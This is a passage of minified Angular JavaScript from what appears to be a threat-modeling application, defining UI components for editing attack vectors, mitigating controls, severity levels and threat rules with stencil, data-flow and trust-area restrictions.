t{constructor(e,i,n,r,c){this.theme=n,this.dataService=r,this.translate=c,this.canEdit=!0,this.isShownInDialog=!1,e&&(this.attackVector=e,this.isShownInDialog=!0),null!=i&&(this.canEdit=i.Value)}get attackVector(){return this._attackVector}set attackVector(e){this._attackVector=e,this.selectedControl=null}ngOnInit(){}GetAttackVectorTypes(){return eM.GetTypes()}GetAttackVectorTypeName(e){return eM.ToString(e)}LifeCycleChanged(e,i){const n=e.indexOf(i);n>=0?e.splice(n,1):e.push(i)}GetLifeCycles(){return y2.GetKeys()}GetLifeCycleName(e){return y2.ToString(e)}GetSeverityTypes(){return vn.GetTypes()}GetSeverityTypeName(e){return vn.ToString(e)}GetRootAttackVectorGroups(){return this.dataService.Config.ThreatLibrary.SubGroups}GetAttackVectorGroup(){return this.dataService.Config.FindGroupOfAttackVector(this.attackVector)}GetThreatCategoryGroups(){return this.dataService.Config.GetThreatCategoryGroups().filter(e=>e.ThreatCategories.length>0)}GetThreatRules(){return this.dataService.Config.GetThreatRules().filter(e=>{var i;return(null===(i=e.AttackVector)||void 0===i?void 0:i.ID)==this.attackVector.ID})}GetThreatRestriction(e){return Fg.ToString(e,this.dataService,this.translate)}GetPossibleControls(){return this.dataService.Config.GetControls().filter(e=>!e.MitigatedAttackVectors.includes(this.attackVector))}AddExistingControl(e){e.AddMitigatedAttackVector(this.attackVector)}AddControl(){let e=this.dataService.Config.CreateControl(this.dataService.Config.ControlLibrary);e.AddMitigatedAttackVector(this.attackVector),this.selectedControl=e}RemoveControl(e){e.RemoveMitigatedAttackVector(this.attackVector),e==this.selectedControl&&(this.selectedControl=null)}DeleteControl(e){this.dataService.Config.DeleteControl(e),e==this.selectedControl&&(this.selectedControl=null)}GetControls(){return this.dataService.Config.GetControls().filter(e=>e.MitigatedAttackVectors.includes(this.attackVector))}OnGroupChanged(e){let i=this.dataService.Config.GetAttackVectorGroup(e.value),n=this.dataService.Config.FindGroupOfAttackVector(this.attackVector);n&&n.RemoveAttackVector(this.attackVector),i.AddAttackVector(this.attackVector)}dropControl(e,i){const n=this.dataService.Config.GetControls().indexOf(i[e.previousIndex]),r=this.dataService.Config.GetControls().indexOf(i[e.currentIndex]);Qs(this.dataService.Config.GetControls(),n,r)}}return t.\u0275fac=function(e){return new(e||t)(Ee(zp,8),Ee(hf,8),Ee(Oa),Ee(Yi),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-attack-vector"]],inputs:{attackVector:"attackVector",canEdit:"canEdit"},decls:1,vars:1,consts:[[3,"disable",4,"ngIf"],[4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["appearance","fill","class","property-form-field",4,"ngIf"],["multiple","",3,"value","valueChange"],[3,"label",4,"ngFor","ngForOf"],[2,"margin-top","10px"],[2,"text-align","center"],["style","padding: 0 3px 0 3px",4,"ngFor","ngForOf"],["style","text-align: center;",4,"ngFor","ngForOf"],["appearance","fill",1,"property-form-field",2,"margin-top","10px"],[3,"value",4,"ngFor","ngForOf"],["appearance","fill",2,"width","125px","margin-left","10px"],[3,"value","valueChange"],[1,"row",2,"margin-top","10px"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matMenuTriggerFor","matTooltip"],["addMenu","matMenu"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"matMenuTriggerFor"],["existing","matMenu"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px;",4,"ngIf"],["style","margin-top: 15px;",4,"ngIf"],["appearance","fill",1,"property-form-field"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"value","matTooltip","selectionChange"],[4,"ngFor","ngForOf"],[3,"value"],[3,"label",4,"ngIf"],[3,"label"],["matTooltipShowDelay","1000",3,"value","matTooltip",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip"],[2,"padding","0 3px 0 3px"],["color","primary",3,"checked","change"],["matInput","","type","number",3,"ngModel","ngModelChange"],[3,"entry"],["style","margin-top: 10px; margin-bottom: 10px;",4,"ngIf"],[2,"margin-top","10px","margin-bottom","10px"],[3,"capecID"],[3,"cweID"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto","margin-right","0px",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],[3,"control","canEditName","canEditGroup"],[2,"margin-top","15px"],[1,"expansion-panel-headers-align",2,"pointer-events","initial"],["matExpansionPanelContent",""],[3,"canEdit","showAttackVector","threatRule"]],template:function(e,i){1&e&&ne(0,e8e,162,75,"div",0),2&e&&V("ngIf",i.attackVector)},styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.disable[_ngcontent-%COMP%]{pointer-events:none}']}),t})();function t8e(t,a){if(1&t){const e=Ye();m(0,"button",32),he("click",function(){return be(e),Me(B(3).threatRule.Name="")}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function i8e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",4),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"input",30),he("ngModelChange",function(n){return be(e),Me(B(2).threatRule.Name=n)}),u(),s(7,"\n    "),ne(8,t8e,6,3,"button",31),s(9,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,4,"properties.Name")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.threatRule.Name),C(2),V("ngIf",e.threatRule.Name)}}function a8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ct("\n            ",e.Name,"\n          ")}}function n8e(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n          "),ne(2,a8e,2,2,"mat-option",11),s(3,"\n        "),u()),2&t){const e=a.$implicit;V("label",e.Name),C(2),V("ngForOf",e.AttackVectors)}}function o8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function r8e(t,a){if(1&t&&(s(0,"\n          "),it(1,"app-attack-vector",38),s(2,"\n        ")),2&t){const e=B(3);C(1),V("canEdit",!1)("attackVector",e.threatRule.AttackVector)}}function s8e(t,a){if(1&t&&(m(0,"mat-accordion",35),s(1,"\n      "),m(2,"mat-expansion-panel",36),s(3,"\n        "),m(4,"mat-expansion-panel-header"),s(5,"\n          "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n          "),m(10,"mat-panel-description"),s(11),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n          "),u(),s(15,"\n        "),u(),s(16,"\n        "),ne(17,r8e,3,2,"ng-template",37),s(18,"\n      "),u(),s(19,"\n    "),u()),2&t){const e=B(2);C(7),ct("\n            ",re(8,2,"general.AttackVectorInfo"),"\n          "),C(4),ct("\n            ",e.threatRule.AttackVector.Name,"\n            ")}}function c8e(t,a){if(1&t&&(m(0,"mat-option",40),s(1),u()),2&t){const e=a.$implicit;at("matTooltip",e.Description),V("value",e),C(1),ct("\n              ",e.Name,"\n            ")}}function l8e(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n            "),ne(2,c8e,2,3,"mat-option",39),s(3,"\n          "),u()),2&t){const e=a.$implicit;V("label",e.Name),C(2),V("ngForOf",e.ThreatCategories)}}function d8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(3);V("value",e),C(1),ke(re(2,2,i.GetRuleGenerationTypeName(e)))}}function m8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n      "),m(2,"mat-form-field",4),s(3,"\n        "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(B(2).threatRule.RuleGenerationType=n)}),s(9,"\n          "),ne(10,d8e,3,4,"mat-option",11),s(11,"\n        "),u(),s(12,"\n      "),u(),s(13,"\n      "),it(14,"br"),s(15,"\n    "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,3,"properties.RuleGenerationType")),C(3),V("value",e.threatRule.RuleGenerationType),C(2),V("ngForOf",e.GetRuleGenerationTypes())}}function u8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ct("\n            ",e.Name,"\n          ")}}function h8e(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n          "),ne(2,u8e,2,2,"mat-option",11),s(3,"\n        "),u()),2&t){const e=a.$implicit;V("label",e.Name),C(2),V("ngForOf",e.ThreatRules)}}function f8e(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B().$implicit;return Me(B(3).CreatePropertyRestrictionType(c,r))}),s(1),oe(2,"translate"),u()}if(2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ct("\n                ",re(2,2,i.GetRestrictionTypeName(e)),"\n              ")}}function p8e(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),ke(re(2,1,e.DisplayName))}}function _8e(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ID)}}function g8e(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B(3).$implicit;return Me(B(3).SetPropertyDefaultValue(c.PropertyRest,r))}),s(1,"\n                    "),ne(2,p8e,3,3,"ng-container",16),s(3,"\n                    "),ne(4,_8e,2,1,"ng-container",16),s(5,"\n                  "),u()}if(2&t){const e=a.$implicit;V("value",e.ID),C(2),V("ngIf",e.DisplayName),C(2),V("ngIf",!e.DisplayName)}}function C8e(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n                  "),ne(2,g8e,6,3,"mat-option",47),s(3,"\n                "),u()),2&t){const e=a.$implicit;V("label",e.GroupName),C(2),V("ngForOf",e.Properties)}}function y8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(B(2).$implicit.PropertyRest.Value=n)}),u(),s(3,"\n            "),Mt()}if(2&t){const e=B(2).$implicit;C(2),V("ngModel",e.PropertyRest.Value)}}function b8e(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(6);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function M8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"select",54),he("change",function(n){be(e);const r=B(2).$implicit;return Me(B(3).SetLWH(r.PropertyRest,n.target.value))}),s(3,"\n                "),ne(4,b8e,3,4,"option",11),s(5,"\n              "),u(),s(6,"\n            "),Mt()}if(2&t){const e=B(2).$implicit,i=B(3);C(2),V("ngModel",e.PropertyRest.Value),C(2),V("ngForOf",i.GetLMHValues())}}function v8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n            "),m(2,"mat-form-field",51),s(3,"\n              "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n              "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(B().$implicit.PropertyRest.ID=n)}),s(9,"\n                "),ne(10,C8e,4,2,"mat-optgroup",6),s(11,"\n              "),u(),s(12,"\n            "),u(),s(13,"\n            "),m(14,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(B(3).OnNextComparisonType(n,n.PropertyRest))}),s(15),u(),s(16,"\n            "),ne(17,y8e,4,1,"ng-container",16),s(18,"\n            "),ne(19,M8e,7,2,"ng-container",16),s(20,"\n          "),Mt()}if(2&t){const e=B().$implicit,i=B(3);C(5),ke(re(6,6,"general.PropertyName")),C(3),V("value",e.PropertyRest.ID),C(2),V("ngForOf",i.GetAvailablePropertyGroups(e)),C(5),ct("\n              ",e.PropertyRest.ComparisonType,"\n            "),C(2),V("ngIf","Check Box"==i.GetPropertyEditType(e)),C(2),V("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function A8e(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),ke(re(2,1,e.DisplayName))}}function T8e(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ID)}}function E8e(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B(3).$implicit;return Me(B(3).SetPropertyDefaultValue(c.PhyElementRest.Property,r))}),s(1,"\n                    "),ne(2,A8e,3,3,"ng-container",16),s(3,"\n                    "),ne(4,T8e,2,1,"ng-container",16),s(5,"\n                  "),u()}if(2&t){const e=a.$implicit;V("value",e.ID),C(2),V("ngIf",e.DisplayName),C(2),V("ngIf",!e.DisplayName)}}function D8e(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n                  "),ne(2,E8e,6,3,"mat-option",47),s(3,"\n                "),u()),2&t){const e=a.$implicit;V("label",e.GroupName),C(2),V("ngForOf",e.Properties)}}function x8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(B(2).$implicit.PhyElementRest.Property.Value=n)}),u(),s(3,"\n            "),Mt()}if(2&t){const e=B(2).$implicit;C(2),V("ngModel",e.PhyElementRest.Property.Value)}}function w8e(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(6);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function I8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"select",54),he("change",function(n){be(e);const r=B(2).$implicit;return Me(B(3).SetLWH(r.PhyElementRest.Property,n.target.value))}),s(3,"\n                "),ne(4,w8e,3,4,"option",11),s(5,"\n              "),u(),s(6,"\n            "),Mt()}if(2&t){const e=B(2).$implicit,i=B(3);C(2),V("ngModel",e.PhyElementRest.Property.Value),C(2),V("ngForOf",i.GetLMHValues())}}function R8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n            "),m(2,"mat-form-field",51),s(3,"\n              "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n              "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(B().$implicit.PhyElementRest.Property.ID=n)}),s(9,"\n                "),ne(10,D8e,4,2,"mat-optgroup",6),s(11,"\n              "),u(),s(12,"\n            "),u(),s(13,"\n            "),ne(14,x8e,4,1,"ng-container",16),s(15,"\n            "),ne(16,I8e,7,2,"ng-container",16),s(17,"\n          "),Mt()}if(2&t){const e=B().$implicit,i=B(3);C(5),ke(re(6,5,"general.PropertyName")),C(3),V("value",e.PhyElementRest.Property.ID),C(2),V("ngForOf",i.GetAvailablePhyElementPropertyGroups(e)),C(4),V("ngIf","Check Box"==i.GetPropertyEditType(e)),C(2),V("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function S8e(t,a){if(1&t){const e=Ye();m(0,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(n.IsOR=!n.IsOR)}),s(1),u()}if(2&t){const e=B().$implicit;C(1),ct("\n            ",e.IsOR?"OR":"AND","\n          ")}}function k8e(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n          "),m(2,"mat-form-field",4),s(3,"\n            "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n            "),m(8,"input",46),he("ngModelChange",function(n){return Me(be(e).$implicit.Layer=n)}),u(),s(9,"\n            "),m(10,"mat-select",10),he("valueChange",function(n){return Me(be(e).$implicit.RestType=n)}),s(11,"\n              "),ne(12,f8e,3,4,"mat-option",47),s(13,"\n            "),u(),s(14,"\n            "),m(15,"button",48),he("click",function(){const r=be(e).index;return Me(B(3).RemoveStencilRestriction(r))}),oe(16,"translate"),s(17,"\n              "),m(18,"mat-icon"),s(19,"delete"),u(),s(20,"\n            "),u(),s(21,"\n          "),u(),s(22,"\n          "),s(23,"\n          "),ne(24,v8e,21,8,"ng-container",16),s(25,"\n          "),s(26,"\n          "),ne(27,R8e,18,7,"ng-container",16),s(28,"\n          "),ne(29,S8e,2,1,"button",49),s(30,"\n        "),u()}if(2&t){const e=a.$implicit,i=a.last,n=B(3);C(2),ri("padding-left",n.GetLayerPadding(e)),C(3),ke(re(6,10,"general.Type")),C(3),V("ngModel",e.Layer),C(2),V("value",e.RestType),C(2),V("ngForOf",n.GetAvailableRestrictionsTypes(e)),C(3),at("matTooltip",re(16,12,"general.Delete")),C(9),V("ngIf",1==e.RestType),C(3),V("ngIf",3==e.RestType),C(2),V("ngIf",!i)}}function P8e(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n      "),m(2,"mat-form-field",41),s(3,"\n        "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n        "),it(8,"input",42),s(9,"\n      "),u(),s(10,"\n      "),it(11,"br"),s(12),oe(13,"translate"),m(14,"button",43),he("click",function(){return be(e),Me(B(2).AddStencilRestriction())}),oe(15,"translate"),s(16,"\n        "),m(17,"mat-icon"),s(18,"add"),u(),s(19,"\n      "),u(),s(20,"\n      "),m(21,"span",44),s(22),u(),s(23,"\n      "),m(24,"div"),s(25,"\n        "),ne(26,k8e,31,14,"div",45),s(27,"\n      "),u(),s(28,"\n    "),u()}if(2&t){const e=B(2);C(5),ke(re(6,8,"properties.StencilType")),C(3),at("matTooltip",null==e.selectedStencilType?null:e.selectedStencilType.Name),V("spellcheck",e.dataService.HasSpellCheck)("value",null==e.selectedStencilType?null:e.selectedStencilType.Name),C(4),ct("\n      ",re(13,10,"properties.Restrictions")," \n      "),C(2),at("matTooltip",re(15,12,"general.Add")),C(8),ke(e.GetRestrictionString()),C(4),V("ngForOf",e.threatRule.StencilRestriction.DetailRestrictions)}}function O8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),u()),2&t){const e=a.$implicit;V("value",a.index-1),C(1),ct("\n              ",e,"\n            ")}}function N8e(t,a){1&t&&(m(0,"mat-label"),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"properties.Sender")))}function L8e(t,a){1&t&&(m(0,"mat-label"),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"properties.Receiver")))}function z8e(t,a){if(1&t&&(m(0,"mat-label"),s(1),u()),2&t){const e=B().index;C(1),ct("Node",e,"")}}function W8e(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){return be(e),Me(B(4).propertyGroups={})}),s(1),u()}if(2&t){const e=a.$implicit;V("value",null==e?null:e.ID),C(1),ct("\n                ",null==e?null:e.Name,"\n              ")}}function F8e(t,a){if(1&t){const e=Ye();m(0,"button",48),he("click",function(){be(e);const n=B().index,r=Ti(11);return Me(B(3).RemoveDFDNode(n,r))}),oe(1,"translate"),s(2,"\n              "),m(3,"mat-icon"),s(4,"delete"),u(),s(5,"\n            "),u()}2&t&&at("matTooltip",re(1,1,"general.Delete"))}function V8e(t,a){if(1&t){const e=Ye();m(0,"button",55),he("click",function(){be(e);const n=B().index;return Me(B(3).AddDFDNode(n+1))}),oe(1,"translate"),s(2,"\n            "),m(3,"mat-icon",56),s(4,"east"),u(),s(5,"\n          "),u()}2&t&&at("matTooltip",re(1,1,"pages.config.threatrule.addNode"))}function B8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n          "),m(2,"mat-form-field",4),s(3,"\n            "),ne(4,N8e,3,3,"mat-label",16),s(5,"\n            "),ne(6,L8e,3,3,"mat-label",16),s(7,"\n            "),ne(8,z8e,2,1,"mat-label",16),s(9,"\n            "),m(10,"mat-select",14,57),he("valueChange",function(n){return Me(be(e).$implicit.TypeIDs=n)}),s(12,"\n              "),m(13,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B(3);return r.TypeIDs=[],Me(c.propertyGroups={})}),s(14),oe(15,"translate"),u(),s(16,"\n              "),ne(17,W8e,2,2,"mat-option",47),s(18,"\n            "),u(),s(19,"\n            "),ne(20,F8e,6,3,"button",58),s(21,"\n          "),u(),s(22,"\n          "),ne(23,V8e,6,3,"button",59),s(24,"\n        "),Mt()}if(2&t){const e=a.$implicit,i=a.first,n=a.last,r=B(3);C(4),V("ngIf",i),C(2),V("ngIf",n),C(2),V("ngIf",!i&&!n),C(2),V("value",e.TypeIDs),C(4),ke(re(15,8,"pages.config.Any")),C(3),V("ngForOf",r.GetDataFlowEntityTypes()),C(3),V("ngIf",!i&&!n),C(3),V("ngIf",!n)}}function H8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),u()),2&t){const e=a.$implicit;V("value",a.index-1),C(1),ct("\n                  ",e,"\n                ")}}function U8e(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B().$implicit;return Me(B(3).CreatePropertyRestrictionType(c,r))}),s(1),oe(2,"translate"),u()}if(2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ct("\n                  ",re(2,2,i.GetRestrictionTypeName(e)),"\n                ")}}function q8e(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),ke(re(2,1,e.DisplayName))}}function G8e(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ID)}}function j8e(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B(3).$implicit;return Me(B(3).SetPropertyDefaultValue(c.PropertyRest,r))}),s(1,"\n                      "),ne(2,q8e,3,3,"ng-container",16),s(3,"\n                      "),ne(4,G8e,2,1,"ng-container",16),s(5,"\n                    "),u()}if(2&t){const e=a.$implicit;V("value",e.ID),C(2),V("ngIf",e.DisplayName),C(2),V("ngIf",!e.DisplayName)}}function Q8e(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n                    "),ne(2,j8e,6,3,"mat-option",47),s(3,"\n                  "),u()),2&t){const e=a.$implicit;V("label",e.GroupName),C(2),V("ngForOf",e.Properties)}}function $8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(B(2).$implicit.PropertyRest.Value=n)}),u(),s(3,"\n              "),Mt()}if(2&t){const e=B(2).$implicit;C(2),V("ngModel",e.PropertyRest.Value)}}function K8e(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(6);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function X8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"select",54),he("change",function(n){be(e);const r=B(2).$implicit;return Me(B(3).SetLWH(r.PropertyRest,n.target.value))}),s(3,"\n                  "),ne(4,K8e,3,4,"option",11),s(5,"\n                "),u(),s(6,"\n              "),Mt()}if(2&t){const e=B(2).$implicit,i=B(3);C(2),V("ngModel",e.PropertyRest.Value),C(2),V("ngForOf",i.GetLMHValues())}}function Y8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"mat-form-field",51),s(3,"\n                "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n                "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(B().$implicit.PropertyRest.ID=n)}),s(9,"\n                  "),ne(10,Q8e,4,2,"mat-optgroup",6),s(11,"\n                "),u(),s(12,"\n              "),u(),s(13,"\n              "),m(14,"button",52),he("click",function(){be(e);const n=B().$implicit;return Me(B(3).OnNextComparisonType(n,n.PropertyRest))}),s(15),u(),s(16,"\n              "),ne(17,$8e,4,1,"ng-container",16),s(18,"\n              "),ne(19,X8e,7,2,"ng-container",16),s(20,"\n            "),Mt()}if(2&t){const e=B().$implicit,i=B(3);C(5),ke(re(6,6,"general.PropertyName")),C(3),V("value",e.PropertyRest.ID),C(2),V("ngForOf",i.GetAvailablePropertyGroups(e)),C(5),ct("\n                ",e.PropertyRest.ComparisonType,"\n              "),C(2),V("ngIf","Check Box"==i.GetPropertyEditType(e)),C(2),V("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function J8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),u()),2&t){const e=a.$implicit;V("value",e.ID),C(1),ct("\n                  ",e.Name,"\n                ")}}function Z8e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",51),s(1,"\n              "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n              "),m(6,"mat-select",14),he("valueChange",function(n){return be(e),Me(B().$implicit.DataflowRest.TrustAreaIDs=n)}),s(7,"\n                "),m(8,"mat-option",50),he("click",function(){return be(e),Me(B().$implicit.DataflowRest.TrustAreaIDs=[])}),s(9),oe(10,"translate"),u(),s(11,"\n                "),ne(12,J8e,2,2,"mat-option",11),s(13,"\n              "),u(),s(14,"\n            "),u()}if(2&t){const e=B().$implicit,i=B(3);C(3),ke(re(4,4,"pages.config.threatrule.crosses")),C(3),V("value",e.DataflowRest.TrustAreaIDs),C(3),ke(re(10,6,"pages.config.Any")),C(3),V("ngForOf",i.GetAvailableTrustAreas())}}function eIe(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),ke(re(2,1,e.DisplayName))}}function tIe(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=B().$implicit;C(1),ke(e.ID)}}function iIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=B(3).$implicit;return Me(B(3).SetPropertyDefaultValue(c.PhyElementRest.Property,r))}),s(1,"\n                      "),ne(2,eIe,3,3,"ng-container",16),s(3,"\n                      "),ne(4,tIe,2,1,"ng-container",16),s(5,"\n                    "),u()}if(2&t){const e=a.$implicit;V("value",e.ID),C(2),V("ngIf",e.DisplayName),C(2),V("ngIf",!e.DisplayName)}}function aIe(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n                    "),ne(2,iIe,6,3,"mat-option",47),s(3,"\n                  "),u()),2&t){const e=a.$implicit;V("label",e.GroupName),C(2),V("ngForOf",e.Properties)}}function nIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(B(2).$implicit.PhyElementRest.Property.Value=n)}),u(),s(3,"\n              "),Mt()}if(2&t){const e=B(2).$implicit;C(2),V("ngModel",e.PhyElementRest.Property.Value)}}function oIe(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(6);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function rIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"select",54),he("change",function(n){be(e);const r=B(2).$implicit;return Me(B(3).SetLWH(r.PhyElementRest.Property,n.target.value))}),s(3,"\n                  "),ne(4,oIe,3,4,"option",11),s(5,"\n                "),u(),s(6,"\n              "),Mt()}if(2&t){const 